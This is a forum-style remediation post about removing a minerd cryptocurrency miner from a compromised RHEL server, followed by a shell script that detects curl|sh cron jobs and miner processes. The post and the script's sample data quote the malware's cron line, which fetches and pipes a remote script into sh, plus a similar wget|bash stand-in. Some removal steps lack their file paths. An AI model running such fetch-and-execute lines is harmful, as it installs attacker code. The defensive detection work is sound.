I have an AWS EC2 instance running RHEL 7.2 which seems to have been hacked by a BitCoin CPU Miner. When I run ps -eo pcpu,args --sort=-%cpu | head, it shows that there is a CPU miner that’s taking up more than 90% of CPU utilization.
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script –
- On monkeyoto’s suggestion, I blocked all communication with the mining pool server – iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
- Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from
- Removed the directory
- Deleted the files
- Stopped the minerd process – service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way.
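A triage script, added here as an example (not from the original post or the poster's server), that checks for the two indicators the answer describes: cron entries that pipe a downloaded script into a shell, and a miner binary at the top of the process list. The crontab and ps samples are constructed inline so it runs offline; the miner names other than minerd, the stratum URL and the wallet value are assumptions or placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: triage checks for the two
# indicators the answer describes, run offline against constructed samples.
# In production, feed real data:  find_remote_exec_cron /var/spool/cron/*
# or  ps -eo pcpu,args --sort=-%cpu | find_miner_procs

# Print crontab lines that fetch something with curl/wget and pipe it into
# a shell, the persistence mechanism found on the box (curl ... | sh).
# Reads the files given as arguments, or stdin when none are given.
find_remote_exec_cron() {
    grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$@"
}

# Print "pcpu args" lines whose command (first token after the CPU column)
# is a known miner binary. Only minerd comes from the post; xmrig and
# cpuminer are assumed additional names. Matching the command token means a
# "grep minerd" line does not trigger a false positive.
find_miner_procs() {
    grep -Ei '^[[:space:]]*[0-9.]+[[:space:]]+([^[:space:]]*/)?(minerd|xmrig|cpuminer)([[:space:]]|$)' "$@"
}

# Constructed sample crontab (the curl|sh entry is the one from the post).
SAMPLE_CRON=$(cat <<'EOF'
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh
30 4 * * * wget -q -O - http://example.invalid/update.sh | bash
EOF
)

# Constructed "ps -eo pcpu,args" output; the stratum URL and
# WALLET_PLACEHOLDER are made up for the sample.
SAMPLE_PS=$(cat <<'EOF'
%CPU COMMAND
 95.3 /tmp/minerd -o stratum+tcp://xmr.crypto-pool.fr -u WALLET_PLACEHOLDER
  0.5 /usr/sbin/sshd -D
  0.1 grep minerd
EOF
)

echo "== cron entries that pipe remote content into a shell =="
printf '%s\n' "$SAMPLE_CRON" | find_remote_exec_cron
echo "== miner processes =="
printf '%s\n' "$SAMPLE_PS" | find_miner_procs
```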